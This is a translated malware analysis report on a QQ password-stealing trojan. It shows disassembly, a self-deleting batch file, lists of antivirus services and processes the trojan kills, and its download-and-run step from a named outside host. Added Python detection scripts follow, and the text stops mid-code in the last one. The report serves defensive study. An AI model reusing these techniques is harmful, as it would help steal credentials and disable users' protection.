- Title: [W32QQRob.BK!pws] Trojan Analysis Report
- Author: 梦旅人
- Date: 2009-12-13 16:44
- Link: http://bbs.pediy.com/showthread.php?t=1030
I. Overview
This document describes the behaviour, removal method and technical details of the W32QQRob.BK!pws trojan.
The trojan spreads mainly over the network. It is 118,959 bytes in size and was written in Borland Delphi 6.0 - 7.0. When run it first checks its own path; if that is not the expected path it copies itself to "C:\WINDOWS\system32\VM_STI.EXE", sets itself to run at startup, stops antivirus software and disables it, closes any running Recovery Genius (还原精灵) window and the QQ process, and intercepts the password through a hook when QQ starts. The trojan also downloads a file from "http://alaqq17e.3322.org/new.jpg" to "c:\new.exe" and runs it.
II. Behaviour summary
1) Virus name: VM_STI_1.exe
2) Virus type: W32QQRob.BK!pws trojan
3) Virus size: 118,959 bytes
4) Propagation: Internet
5) Related files:
a 【W32QQRob.BK!pws木马】分析报告.doc: this analysis report
b VM_STI_1.exe.v: virus sample;
c Deleteme.bat: file dropped by the virus;
d VM_STI.idb: IDA database of the virus;
6) Detailed behaviour:
a Checks the operating system version and, if it is the targeted type, dynamically calls an API to hide itself. Looks for "C:\WINDOWS\system32\VM_STI.EXE": if it exists, resets it to normal attributes and deletes it; if it does not, copies itself there, sets the attributes to READONLY|HIDDEN|SYSTEM and then runs it.
b If its own path is not the expected one, creates a Deleteme.bat in C:\WINDOWS\system32, runs it with CreateProcess and then terminates itself; once it has terminated, Deleteme.bat deletes the trojan and then itself.
c Downloads a file from "http://alaqq17e.3322.org/new.jpg" to "c:\new.exe" and runs it. Because the link is already dead it is not known what file was served, but the trojan sleeps for one hour before downloading, i.e. it has an incubation period, and sleeps another 300 seconds after the download before running the file.
d Stops antivirus services, namely:
"RsRavMon" "RsCCenter" "KVSrvXP" "kavsvc" "KWatchSvc" "wscsvc" "SNDSrvc" "ccProxy" "ccEvtMgr" "SPBBCSvc" "Symantec Core LC" "navapsvc" "NPFMntor" "MskService" "McShield" "McAfeeFramework".
Shuts down running antivirus software by terminating the following processes: FireTray.exe UpdaterUI.exe TBMon.exe SHSTAT.EXE RAV.EXE RAVMON.EXE RAVTIMER.EXE Iparmor.exe MAILMON.EXE KAVPFW.EXE KmailMon.EXE KAVStart.exe TrojanDetector.EXE KVFW.EXE KAVPLUS.EXE KWATCHUI.EXE KPOPMON.EXE KAV32.EXE CCAPP.EXE MCAGENT.EXE MCVSESCN.EXE MSKAGENT.EXE EGHOST.EXE KWatch9x.exe KvDetech.exe KVCenter.kxp UIHost.exe KATMain.EXE
Finds and closes the following windows: TrojDie_Frame KvXP_ExpertFrame Jiangmin Registry Monitor Ex KVXP_Monitor 瑞星杀毒软件下载版 金山毒霸 2005 卡巴斯基反病毒单机版 WHXMDI0 Symantec AntiVirus 企业版 江民杀毒软件 KV2004:实时监视 天网防火墙个人版 天网防火墙企业版 噬菌体 木马克星 RavMon.exe TfLockDownMain ZoneAlarm ZAFrameWnd Tapplication 〖列举启动〗
Also looks for the Recovery Genius (还原精灵) windows 'LanCardS','原精','还原精灵','原精 DEMO','还原精灵 DEMO','原精21st','还原精灵21st','原精21st DEMO','还原精灵21st DEMO','还原精灵21st操作选择'
e Kills the QQ process and installs a hook to capture the password. Before installing the hook it deletes the keyboard-protection driver "npkcrypt.sys", copying the fake file "npkcrypt.bak" over it and then deleting it.
f Writes itself to the registry so that it runs at boot, then under SYSTEM\CurrentControlSet\Services\ adds: navapsvc, RsRavMon, RsCCenter, kavsvc, KVSrvXP, wscsvc, KPfwSvc, KWatchSvc, SNDSrvc, ccProxy, ccEvtMgr, ccSetMgr, SPBBCSvc, Symantec Core LC, NPFMntor, MskService, FireSvc, McShield, McTaskManager, McAfeeFramework, and sets the "Start" value of each to 4. Under SoftWare\Microsoft\Windows\CurrentVersion\Run it attempts to delete: RavMon, KAVPersonal50, RavTimer, RavTask, KvMonXP, iDuba Personal FireWall, KAVRun, KpopMon, Kulansyn, KavPFW, KvXP, ccApp, SSC_UserPrompt, NAV CfgWiz, MCAgentExe, McRegWiz, MCUpdateExe, MSKAGENTEXE, MSKDetectorExe, VirusScanOnline, VSOCheckTask, McAfeeUpdaterUI, Network Associates Error Reporting, Service, ShStatEXE, KavStart, Services, KWatch9x.
III. Removal
1) Terminate the "VM_STI.EXE" process and any new.exe process that may exist
2) Delete "C:\WINDOWS\system32\VM_STI.EXE" and C:\new.exe if present
3) Open the registry editor and delete the virus's startup entry
4) Restore the startup configuration of the antivirus services that may have been damaged, and reinstall the affected antivirus software
5) The QQ keyboard-protection driver has been destroyed and must be restored; reinstalling a fresh copy of QQ is recommended.
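The indicators in sections II and III can be checked mechanically. The following Python is an example added to this report (not the author's code): it scans a host snapshot for the dropped file and its READONLY|HIDDEN|SYSTEM attributes, the payload and batch file, a Run entry pointing at VM_STI.EXE, the listed services forced to Start=4, and a missing npkcrypt.sys. The snapshot format is an assumption of the example, and the sample values (the Run value name "VM_STI", the QQ install path) are constructed; on a live Windows host the same four views would be collected with psutil and winreg.

```python
"""Offline check of a host snapshot for the W32QQRob.BK!pws indicators
in this report (example code added to the report; not the author's).

Snapshot format (an assumption of this example): a dict holding the
process list, a file table (path -> FILE_ATTRIBUTE_* bits), the values of
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run, and the Start value of
each key under SYSTEM\\CurrentControlSet\\Services. On a live Windows host
these would come from psutil/winreg; here they are constructed inline.
"""

FILE_ATTRIBUTE_READONLY = 0x01
FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04
# The trojan pushes 7 to SetFileAttributesA, i.e. all three bits.
STEALTH_ATTRS = FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM

DROPPED_PATH = r"C:\WINDOWS\system32\VM_STI.EXE"
PAYLOAD_PATH = r"C:\new.exe"
BATCH_PATH = r"C:\WINDOWS\system32\Deleteme.bat"
KEYBOARD_DRIVER = "npkcrypt.sys"  # QQ keyboard-protection driver the trojan deletes

SERVICE_DISABLED = 4
# Services whose Start value the trojan forces to 4 (section II, item f).
TARGETED_SERVICES = {s.lower() for s in (
    "navapsvc", "RsRavMon", "RsCCenter", "kavsvc", "KVSrvXP", "wscsvc",
    "KPfwSvc", "KWatchSvc", "SNDSrvc", "ccProxy", "ccEvtMgr", "ccSetMgr",
    "SPBBCSvc", "Symantec Core LC", "NPFMntor", "MskService", "FireSvc",
    "McShield", "McTaskManager", "McAfeeFramework",
)}


def scan_snapshot(snap):
    """Return the list of matched indicators (empty means nothing matched)."""
    findings = []
    procs = {p.lower() for p in snap["processes"]}
    files = {path.lower(): attrs for path, attrs in snap["files"].items()}

    for name in ("vm_sti.exe", "new.exe"):
        if name in procs:
            findings.append(f"process running: {name}")

    attrs = files.get(DROPPED_PATH.lower())
    if attrs is not None:
        msg = f"dropped file present: {DROPPED_PATH}"
        if attrs & STEALTH_ATTRS == STEALTH_ATTRS:
            msg += " (READONLY|HIDDEN|SYSTEM set)"
        findings.append(msg)
    for path in (PAYLOAD_PATH, BATCH_PATH):
        if path.lower() in files:
            findings.append(f"file present: {path}")

    # Any Run value whose command points at the dropped file is the autostart.
    for value_name, command in snap["run_key"].items():
        if "vm_sti.exe" in command.lower():
            findings.append(f"Run key autostart: {value_name} -> {command}")

    disabled = sorted(
        svc for svc, start in snap["services"].items()
        if svc.lower() in TARGETED_SERVICES and start == SERVICE_DISABLED
    )
    if disabled:
        findings.append("security services set to Start=4: " + ", ".join(disabled))

    # With npkcrypt.sys deleted, QQ's keyboard protection is gone (section III, step 5).
    if snap.get("qq_installed") and not any(p.endswith(KEYBOARD_DRIVER) for p in files):
        findings.append(f"QQ installed but {KEYBOARD_DRIVER} is missing")
    return findings


# Constructed snapshots: the Run value name "VM_STI" and the QQ install
# path are made up for this example; the report does not give them.
INFECTED_SNAPSHOT = {
    "processes": ["explorer.exe", "VM_STI.EXE", "QQ.exe"],
    "files": {
        DROPPED_PATH: STEALTH_ATTRS,
        r"C:\Program Files\Tencent\QQ\npkcrypt.bak": 0x20,
    },
    "run_key": {"VM_STI": DROPPED_PATH},
    "services": {"wscsvc": 4, "McShield": 4, "Dhcp": 2},
    "qq_installed": True,
}
CLEAN_SNAPSHOT = {
    "processes": ["explorer.exe", "QQ.exe"],
    "files": {r"C:\Program Files\Tencent\QQ\npkcrypt.sys": 0x20},
    "run_key": {"QQ": r"C:\Program Files\Tencent\QQ\QQ.exe"},
    "services": {"wscsvc": 2, "Dhcp": 2},
    "qq_installed": True,
}

if __name__ == "__main__":
    for line in scan_snapshot(INFECTED_SNAPSHOT):
        print(line)
```

The service check matches on the name list from item f rather than on "any disabled service", because Start=4 is legitimate for many services; the attribute check is kept separate from the presence check so a copy left with normal attributes after partial cleanup is still reported.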
IV. Detailed analysis
PEp0:0040BA68 public start
PEp0:0040BA68 start: ; CODE XREF: PEp1:00414583 j
...
PEp0:0040BA94 call sub_406D7C
PEp0:0040BA99 call CallGetVersion ; get the operating system version
PEp0:0040BA9E test al, al
PEp0:0040BAA0 jz short loc_40BAA7 ; not the expected version, skip
PEp0:0040BAA2 call HideMySelf ; calls RegisterServiceProcess to hide itself
PEp0:0040BB31 jz short loc_40BB62 ; failed to get the file attributes, skip
PEp0:0040BB33 push 80h
PEp0:0040BB38 push ebx
PEp0:0040BB39 call SetFileAttributesA ; set the file's attributes to FILE_ATTRIBUTE_NORMAL (80h)
PEp0:0040BB3E push ebx
PEp0:0040BB3F call DeleteFileA ; delete the existing copy of itself
PEp0:0040BB44 cmp eax, 1
PEp0:0040BB47 sbb eax, eax
PEp0:0040BB49 inc eax
PEp0:0040BB4A test al, al
PEp0:0040BB4C jnz short loc_40BB62 ; deletion succeeded, jump to copy the file and run it
PEp0:0040BB4E xor eax, eax
PEp0:0040BB50 call CallExitProcess ; terminate itself
PEp0:0040BB78 call CopyFileA ; copy itself to "C:\WINDOWS\system32\VM_STI.EXE"
PEp0:0040BB7D push 7
PEp0:0040BB7F push ebx
PEp0:0040BB80 call SetFileAttributesA ; set the attributes to READONLY|HIDDEN|SYSTEM (7)
PEp0:0040BBB9 call WinExec ; run "C:\WINDOWS\system32\VM_STI.EXE"
PEp0:0040BBBE mov eax, off_40C0D4
PEp0:0040BBC3 mov eax, [eax]
PEp0:0040BBC5 mov edx, offset word_40BD08
PEp0:0040BBCA call CmpString_0
PEp0:0040BBCF jnz short loc_40BBD6
PEp0:0040BBD1 call CreateDeletemeRun ; create Deleteme.bat and run it; after the program exits the batch file deletes the trojan and then itself. Deleteme.bat contains:
:try
del "C:\Documents and Settings\Administrator\桌面\盗QQ木马\VM_STI_1.exe"
if exist "C:\Documents and Settings\Administrator\桌面\盗QQ木马\VM_STI_1.exe" goto try
del %0
PEp0:0040BBFB mov ecx, offset CloseHUJL ; close the Recovery Genius (还原精灵) window
PEp0:0040BC00 mov dl, 1
PEp0:0040BC02 mov eax, off_4048AC
PEp0:0040BC07 call CreateThreadCallFun
PEp0:0040BC0C loc_40BC0C: ; CODE XREF: PEp0:0040BBF7 j
PEp0:0040BC0C push 0
PEp0:0040BC0E mov ecx, offset DownFileRun ; download a file and run it
PEp0:0040BC13 mov dl, 1
PEp0:0040BC15 mov eax, off_4048AC
PEp0:0040BC1A call CreateThreadCallFun
PEp0:0040BC1F mov eax, off_40C100
PEp0:0040BC24 mov eax, [eax]
PEp0:0040BC26 mov edx, offset word_40BD08
PEp0:0040BC2B call CmpString_0
PEp0:0040BC30 jnz short loc_40BC45
PEp0:0040BC32 push 0
PEp0:0040BC34 mov ecx, offset KillAntiVirus ; stop antivirus services, disabling the antivirus software
PEp0:0040BC39 mov dl, 1
PEp0:0040BC3B mov eax, off_4048AC
PEp0:0040BC40 call CreateThreadCallFun
PEp0:0040BC45 loc_40BC45: ; CODE XREF: PEp0:0040BC30 j
PEp0:0040BC45 mov eax, off_40C114
PEp0:0040BC4A mov eax, [eax]
PEp0:0040BC4C mov edx, offset word_40BD08
PEp0:0040BC51 call CmpString_0
PEp0:0040BC56 jnz short loc_40BC6B
PEp0:0040BC58 push 0
PEp0:0040BC5A mov ecx, offset KillQQProcess ; kill the QQ process
PEp0:0040BC5F mov dl, 1
PEp0:0040BC61 mov eax, off_4048AC
PEp0:0040BC66 call CreateThreadCallFun
PEp0:0040BC6B loc_40BC6B: ; CODE XREF: PEp0:0040BC56 j
PEp0:0040BC6B nop
PEp0:0040BC6C nop
PEp0:0040BC6D push 0
PEp0:0040BC6F mov ecx, offset ReyOfAntiViu ; write antivirus-related registry entries
PEp0:0040BC74 mov dl, 1
PEp0:0040BC76 mov eax, off_4048AC
PEp0:0040BC7B call CreateThreadCallFun
PEp0:0040BC80 push 0
PEp0:0040BC82 mov ecx, offset DelKeyGetQQ ; steal the QQ password when QQ logs in
PEp0:0040BC87 mov dl, 1
PEp0:0040BC89 mov eax, off_4048AC
PEp0:0040BC8E call CreateThreadCallFun
Below is how the similar functions DownFileRun, CloseHUJL, KillAntiVirus, KillQQProcess, ReyOfAntiViu and DelKeyGetQQ are invoked. Because all six are invoked in exactly the same way, I only analyse the invocation of DownFileRun.
PEp0:0040BC0E mov ecx, offset DownFileRun ; download a file and run it
PEp0:0040BC13 mov dl, 1
PEp0:0040BC15 mov eax, off_4048AC
PEp0:0040BC1A call CreateThreadCallFun
CreateThreadCallFun first saves the address of another function, CallMainExitThread, in ecx; that function calls DownFileRun and then ends its own thread. CreateThreadCallFun then starts a new thread, passing CallMainExitThread in as the routine the thread is to invoke. The new thread's entry point is StartAddress. Below is the implementation of CreateThreadCallFun:
PEp0:0040496C CreateThreadCallFun proc near ; CODE XREF: GetQQNumber+1CE p
...
PEp0:0040497E loc_40497E: ; CODE XREF: CreateThreadCallFun+8 j
PEp0:0040497E mov esi, ecx ; address of the worker code, e.g. DownFileRun
PEp0:00404980 mov ebx, edx
PEp0:00404982 mov edi, eax
PEp0:00404984 xor edx, edx
PEp0:00404986 mov eax, edi
PEp0:00404988 call sub_4031F4
PEp0:0040498D xor eax, eax
PEp0:0040498F mov [edi+0Ch], eax
PEp0:00404992 mov [edi+14h], esi ; store the address of the worker function (e.g. DownFileRun) at [edi+14h]
PEp0:00404995 push edi
PEp0:00404996 mov eax, [ebp+arg_0] ; fetch the argument
PEp0:00404999 push eax
PEp0:0040499A lea eax, [edi+8]
PEp0:0040499D push eax
PEp0:0040499E mov ecx, offset CallMainExitThread ; code that ends the current thread
PEp0:004049A3 xor edx, edx
PEp0:004049A5 xor eax, eax
PEp0:004049A7 call CallCreateThread ; create the thread, passing the address of the thread-ending code above as the thread routine's parameter
...
PEp0:004049CA CreateThreadCallFun endp
CallCreateThread simply starts a new thread; its lpParameter is the address of the CallMainExitThread function described above:
PEp0:00403B44 CallCreateThread proc near ; CODE XREF: CreateThreadCallFun+3B p
...
PEp0:00403B4A mov edi, ecx ; address of the thread-ending function
PEp0:00403B4C mov esi, edx
PEp0:00403B4E mov ebx, eax
PEp0:00403B50 mov eax, 8
PEp0:00403B55 call sub_4024FC
PEp0:00403B5A mov [eax], edi ; store the address of the self-ending code at [eax]
PEp0:00403B5C mov edx, [ebp+arg_8] ; fetch the argument, i.e. the edi value passed by the caller; the content at edi+14h is the address of the worker function
PEp0:00403B5F mov [eax+4], edx ; save edx at [eax+4]; it is restored when the thread ends itself and calls the worker function
PEp0:00403B62 mov byte_40D035, 1
PEp0:00403B69 mov edx, [ebp+lpThreadId]
PEp0:00403B6C push edx ; lpThreadId
PEp0:00403B6D mov edx, [ebp+dwCreationFlags]
PEp0:00403B70 push edx ; dwCreationFlags
PEp0:00403B71 push eax ; lpParameter
PEp0:00403B72 mov eax, offset StartAddress
PEp0:00403B77 push eax ; lpStartAddress
PEp0:00403B78 push esi ; dwStackSize
PEp0:00403B79 push ebx ; lpThreadAttributes
PEp0:00403B7A call CreateThread ; lpParameter is eax, whose content is 00404900
...
PEp0:00403B83 CallCreateThread endp
The thread entry point StartAddress mainly performs the assignments below and then calls CallMainExitThread.
PEp0:00403B0C ; DWORD __stdcall StartAddress(LPVOID)
PEp0:00403B0C StartAddress proc near ; DATA XREF: CallCreateThread+2E o
...
PEp0:00403B23 mov eax, [ebp+arg_0] ; fetch the thread routine's parameter; in this debugging session its content is 00404900
PEp0:00403B26 mov ecx, [eax+4] ; restore the edi from the code at 00404992 into ecx
PEp0:00403B29 mov edx, [eax] ; use the value in eax as an address and load its content into edx, here 00404900
PEp0:00403B2B push ecx
PEp0:00403B2C push edx
PEp0:00403B2D call sub_40251C
PEp0:00403B32 pop edx
PEp0:00403B33 pop eax ; move the value of ecx into eax
PEp0:00403B34 call edx ; call the code at 00404900, i.e. CallMainExitThread
PEp0:00403B3F StartAddress endp
CallMainExitThread dynamically calls DownFileRun or one of the other worker functions and then terminates its own thread.
PEp0:00404900 CallMainExitThread proc near ; DATA XREF: CreateThreadCallFun+32 o
...
PEp0:00404907 mov [ebp+var_4], eax ; store the edi value from the code at 00404992 here
PEp0:0040490A mov eax, [ebp+var_4]
PEp0:0040490D mov byte ptr [eax+10h], 0
PEp0:00404911 xor eax, eax
PEp0:00404913 push ebp
PEp0:00404914 push offset loc_40495F
PEp0:00404919 push dword ptr fs:[eax]
PEp0:0040491C mov fs:[eax], esp
PEp0:0040491F mov ebx, [ebp+var_4] ; load the edi value from the code at 00404992 into ebx
PEp0:00404922 mov eax, [ebp+var_4]
PEp0:00404925 call dword ptr [ebx+14h] ; the content at edi+14h in the code at 00404992 is the worker function's address, so this calls e.g. DownFileRun
PEp0:00404928 xor eax, eax
PEp0:0040492A pop edx
PEp0:0040492B pop ecx
PEp0:0040492C pop ecx
PEp0:0040492D mov fs:[eax], edx
PEp0:00404930 push offset loc_404966
PEp0:00404935 loc_404935: ; CODE XREF: PEp0:00404964 j
PEp0:00404935 lea eax, [ebp+dwExitCode]
PEp0:00404938 push eax ; lpExitCode
PEp0:00404939 mov eax, [ebp+var_4]
PEp0:0040493C mov eax, [eax+4]
PEp0:0040493F push eax ; hThread
PEp0:00404940 call GetExitCodeThread
PEp0:00404945 mov eax, [ebp+var_4]
PEp0:00404948 mov edx, [ebp+dwExitCode]
PEp0:0040494B mov [eax+0Ch], edx
PEp0:0040494E mov eax, [ebp+var_4]
PEp0:00404951 mov byte ptr [eax+10h], 1
PEp0:00404955 mov eax, [ebp+dwExitCode]
PEp0:00404958 push eax ; dwExitCode
PEp0:00404959 call ExitThread
PEp0:00404959 CallMainExitThread endp
Below are the implementations of the similar functions DownFileRun, CloseHUJL, KillAntiVirus, KillQQProcess, ReyOfAntiViu and DelKeyGetQQ.
======================================================================
DownFileRun downloads a file and executes it. The download link is http://alaqq17e.3322.org/new.jpg and the file is saved to c:\new.exe; both the link and the file name are stored encrypted and are decrypted during execution. There is a one-hour incubation period before the download, and the file is not executed until five minutes after the download. Since the link is already dead, it is not known what file was downloaded.
PEp0:0040AC7C DownFileRun proc near ; DATA XREF:
...
PEp0:0040AC97 push 36EE80h ; dwMilliseconds
PEp0:0040AC9C call Sleep ; sleep for one hour (36EE80h = 3,600,000 ms)
PEp0:0040ACA1 mov eax, offset byte_40D79C
PEp0:0040ACA6 mov edx, offset asc_40AD88 ; " "
PEp0:0040ACAB call sub_403BDC
PEp0:0040ACB0 mov eax, offset byte_40D79C
PEp0:0040ACB5 mov edx, offset asc_40AD88 ; " "
PEp0:0040ACBA call sub_403BDC
PEp0:0040ACBF lea edx, [ebp+var_8]
PEp0:0040ACC2 mov eax, offset aTrmXs@mirpjhoh ; "TRm]XS@mIrPjHoHnH^ukXbX"
PEp0:0040ACC7 call RevertString
PEp0:0040ACCC mov eax, [ebp+var_8]
PEp0:0040ACCF lea edx, [ebp+var_4]
PEp0:0040ACD2 call CallWSAStrart ; initialise networking
PEp0:0040ACD7 lea edx, [ebp+var_C]
PEp0:0040ACDA mov eax, offset aHntmg_@jhl ; "HNtmG_@jHL"
PEp0:0040ACDF call RevertString ; decrypt the string
PEp0:0040ACE4 mov edx, [ebp+var_C]
PEp0:0040ACE7 mov eax, [ebp+var_4]
PEp0:0040ACEA call sub_403E4C
PEp0:0040ACEF jz short loc_40AD57
PEp0:0040ACF1 xor ebx, ebx
PEp0:0040ACF3 mov esi, 0Bh ; retry counter: up to 11 download attempts
PEp0:0040ACF8 loc_40ACF8: ; CODE XREF:
PEp0:0040ACF8 lea edx, [ebp+var_10]
PEp0:0040ACFB mov eax, offset aToexwbqsgbqtul ; "ToeXWbQsGbQtUL"
PEp0:0040AD00 call RevertString ; decrypt the string
PEp0:0040AD05 mov eax, [ebp+var_10]
PEp0:0040AD08 push eax
PEp0:0040AD09 lea edx, [ebp+var_14]
PEp0:0040AD0C mov eax, offset aVcmpx?dkgrahts ; "VCMpX?dkGrAhTSAmHOYaG_HoH_DjWsEcGruaYnu"...
PEp0:0040AD11 call RevertString ; decrypt the string
PEp0:0040AD16 mov eax, [ebp+var_14]
PEp0:0040AD19 pop edx
PEp0:0040AD1A call InternetRead_0 ; read data from "http://alaqq17e.3322.org/new.jpg"
PEp0:0040AD1F test al, al
PEp0:0040AD21 jnz short loc_40AD2F
PEp0:0040AD23 push 493E0h ; dwMilliseconds
PEp0:0040AD28 call Sleep ; download failed: sleep five minutes (493E0h = 300,000 ms) before retrying
PEp0:0040AD2D jmp short loc_40AD33
PEp0:0040AD2F loc_40AD2F: ; CODE XREF:
PEp0:0040AD2F mov bl, 1
PEp0:0040AD31 jmp short loc_40AD36
PEp0:0040AD33 loc_40AD33: ; CODE XREF:
PEp0:0040AD33 dec esi
PEp0:0040AD34 jnz short loc_40ACF8
PEp0:0040AD36 loc_40AD36: ; CODE XREF:
PEp0:0040AD36 test bl, bl
PEp0:0040AD38 jz short loc_40AD57
PEp0:0040AD3A push 0 ; uCmdShow
PEp0:0040AD3C lea edx, [ebp+var_18]
PEp0:0040AD3F mov eax, offset aToexwbqsgbqtul ; "ToeXWbQsGbQtUL"
PEp0:0040AD44 call RevertString ; decrypt the string
PEp0:0040AD49 mov eax, [ebp+var_18]
PEp0:0040AD4C call Test_eax_1
PEp0:0040AD51 push eax ; lpCmdLine
PEp0:0040AD52 call WinExec ; run "c:\new.exe"
...
PEp0:0040AD7E DownFileRun endp
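The observable on the wire in DownFileRun is a URL ending in .jpg whose response body is a PE image that is then written to new.exe. The following Python is an example added to this report (not the author's code) of the check a proxy or sandbox would apply: sniff the real type of the body from its magic bytes, including the MZ header and the e_lfanew pointer to the "PE\0\0" signature, and compare it with the type the URL's extension claims. The sample bodies are constructed inline; the PE stub is only a header, not a program.

```python
"""Flag responses whose body type contradicts the URL extension, the
pattern of new.jpg -> new.exe in DownFileRun. Example code added to this
report (not the author's); the sample bodies are constructed here.
"""
import struct
from urllib.parse import urlparse


def sniff_type(body: bytes) -> str:
    """Identify the real file type from leading magic bytes."""
    if body[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if body[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if body[:2] == b"MZ" and len(body) >= 0x40:
        # IMAGE_DOS_HEADER.e_lfanew (offset 0x3C) gives the PE signature offset.
        (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
        if body[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "pe"
        return "mz-dos"
    return "unknown"


# What each extension claims to be; anything not listed is not judged.
EXT_TYPES = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".exe": "pe", ".dll": "pe"}


def extension_mismatch(url: str, body: bytes):
    """Return a description of the mismatch, or None when the body matches
    the extension or the extension makes no claim we can check."""
    path = urlparse(url).path.lower()
    ext = path[path.rfind("."):] if "." in path else ""
    claimed = EXT_TYPES.get(ext)
    actual = sniff_type(body)
    if claimed is None or claimed == actual:
        return None
    return f"{url}: extension {ext} claims {claimed}, body is {actual}"


def make_fake_pe() -> bytes:
    """Constructed MZ/PE header stub for the sample (headers only, not runnable code)."""
    body = bytearray(b"MZ" + b"\0" * 0x3E)      # 0x40-byte DOS header
    struct.pack_into("<I", body, 0x3C, 0x40)    # e_lfanew -> right after the DOS header
    body += b"PE\0\0" + b"\0" * 20              # signature + empty IMAGE_FILE_HEADER
    return bytes(body)


if __name__ == "__main__":
    print(extension_mismatch("http://alaqq17e.3322.org/new.jpg", make_fake_pe()))
    print(extension_mismatch("http://alaqq17e.3322.org/new.jpg", b"\xff\xd8\xff\xe0JFIF"))
```

The check deliberately ignores the Content-Type header, which the server controls; the magic bytes are what the downloader on the host actually executes. Requiring the PE signature, not just "MZ", avoids flagging plain DOS stubs and truncated downloads as executables.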
KillAntiVirus mainly stops antivirus services and closes the specified antivirus windows; the window-closing step loops forever, once every 3 seconds.
PEp0:0040AE0C KillAntiVirus: ; DATA XREF: PEp0:0040BC34 o
PEp0:0040AE0C call KillAntiVirus_1
PEp0:0040AE11 loc_40AE11: ; CODE XREF:
PEp0:0040AE11 call CloseAntiVirus
PEp0:0040AE16 push 0BB8h
PEp0:0040AE1B call Sleep ; sleep 3 seconds
PEp0:0040AE20 jmp short loc_40AE11
PEp0:0040AE22 retn
KillAntiVirus_1 simply calls StopProcservice to stop the antivirus services, namely: "RsRavMon" "RsCCenter" "KVSrvXP" "kavsvc" "KWatchSvc" "wscsvc" "SNDSrvc" "ccProxy" "ccEvtMgr" "SPBBCSvc" "Symantec Core LC" "navapsvc" "NPFMntor" "MskService" "McShield" "McAfeeFramework".
StopProcservice stops a service by sending control code 1.
PEp0:0040969C StopProcservice proc near ; CODE XREF:
...
PEp0:004096C8 push 0F003Fh ; dwDesiredAccess
PEp0:004096CD push 0 ; lpDatabaseName
PEp0:004096CF push 0 ; lpMachineName
PEp0:004096D1 call OpenSCManagerA
PEp0:004096D6 mov edi, eax
PEp0:004096D8 test edi, edi
PEp0:004096DA jbe short loc_40974C
PEp0:004096DC push 0F01FFh ; dwDesiredAccess
PEp0:004096E1 push esi ; lpServiceName
PEp0:004096E2 push edi ; hSCManager
PEp0:004096E3 call OpenServiceA
PEp0:004096E8 mov esi, eax
PEp0:004096EA test esi, esi
PEp0:004096EC jbe short loc_409746
PEp0:004096EE push offset ServiceStatus ; lpServiceStatus
PEp0:004096F3 push 1 ; dwControl
PEp0:004096F5 push esi ; hService
PEp0:004096F6 call ControlService ; control code 1 is SERVICE_CONTROL_STOP, which stops the service
PEp0:004096FB test eax, eax
PEp0:004096FD jz short loc_40974C ; stop request failed, jump out
PEp0:004096FF push 3E8h ; dwMilliseconds
PEp0:00409704 call Sleep ; sleep one second, then jump
PEp0:00409709 jmp short loc_40971E
PEp0:0040970B loc_40970B: ; CODE XREF:
PEp0:0040970B cmp ServiceStatus.dwCurrentState, 3
PEp0:00409712 jnz short loc_40972D ; state is not SERVICE_STOP_PENDING (3), jump to the final check
PEp0:00409714 push 3E8h ; dwMilliseconds
PEp0:00409719 call Sleep
PEp0:0040971E loc_40971E: ; CODE XREF:
PEp0:0040971E push offset ServiceStatus ; lpServiceStatus
PEp0:00409723 push esi ; hService
PEp0:00409724 call QueryServiceStatus ; get the service's current status
PEp0:00409729 test eax, eax
PEp0:0040972B jnz short loc_40970B ; query succeeded, jump back
PEp0:0040972D loc_40972D: ; CODE XREF: StopProcservice+76 j
PEp0:0040972D cmp ServiceStatus.dwCurrentState, 1
PEp0:00409734 jz short loc_40974C ; state is SERVICE_STOPPED (1): the service is no longer running, jump out
...
PEp0:00409770 StopProcservice endp
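Every stop that StopProcservice drives to completion (ControlService followed by polling QueryServiceStatus until SERVICE_STOPPED) makes the Service Control Manager log one System-log event 7036, "The X service entered the stopped state". A single security service stopping is routine; many of them stopping within seconds is the signature of this loop. The following Python is an example added to this report (not the author's code) that clusters such stops in time over constructed log records; the record layout (TimeCreated, EventID, service, state) is an assumption about how a collector would normalise the events.

```python
"""Burst detection for the service-stop pattern of StopProcservice in
Windows System-log records. Example code added to this report (not the
author's); the records below are constructed for the example.

Record layout is an assumption: TimeCreated (ISO-8601), EventID, the
service name and the state word, as a collector would normalise them.
"""
from datetime import datetime, timedelta

EVENT_SERVICE_STATE_CHANGE = 7036  # "The X service entered the <state> state"
STOPPED = "stopped"
# Services StopProcservice is called for (section II, item d).
SECURITY_SERVICES = {s.lower() for s in (
    "RsRavMon", "RsCCenter", "KVSrvXP", "kavsvc", "KWatchSvc", "wscsvc",
    "SNDSrvc", "ccProxy", "ccEvtMgr", "SPBBCSvc", "Symantec Core LC",
    "navapsvc", "NPFMntor", "MskService", "McShield", "McAfeeFramework",
)}


def security_stop_bursts(records, window=timedelta(seconds=60), threshold=3):
    """Group stops of security services that fall within `window` of the
    first stop in the group; return the groups with at least `threshold`."""
    stops = sorted(
        (datetime.fromisoformat(r["TimeCreated"]), r["service"])
        for r in records
        if r["EventID"] == EVENT_SERVICE_STATE_CHANGE
        and r["state"] == STOPPED
        and r["service"].lower() in SECURITY_SERVICES
    )
    clusters, current = [], []
    for ts, svc in stops:
        if current and ts - current[0][0] > window:
            clusters.append(current)
            current = []
        current.append((ts, svc))
    if current:
        clusters.append(current)
    return [
        {"first": c[0][0], "last": c[-1][0], "services": [s for _, s in c]}
        for c in clusters if len(c) >= threshold
    ]


# Constructed records: four security services stopped within 8 seconds,
# one unrelated service, and one isolated stop much later.
SAMPLE_RECORDS = [
    {"TimeCreated": "2009-12-13T16:40:00", "EventID": 7036, "service": "Dhcp", "state": "running"},
    {"TimeCreated": "2009-12-13T16:44:01", "EventID": 7036, "service": "RsRavMon", "state": "stopped"},
    {"TimeCreated": "2009-12-13T16:44:03", "EventID": 7036, "service": "RsCCenter", "state": "stopped"},
    {"TimeCreated": "2009-12-13T16:44:05", "EventID": 7036, "service": "wscsvc", "state": "stopped"},
    {"TimeCreated": "2009-12-13T16:44:08", "EventID": 7036, "service": "McShield", "state": "stopped"},
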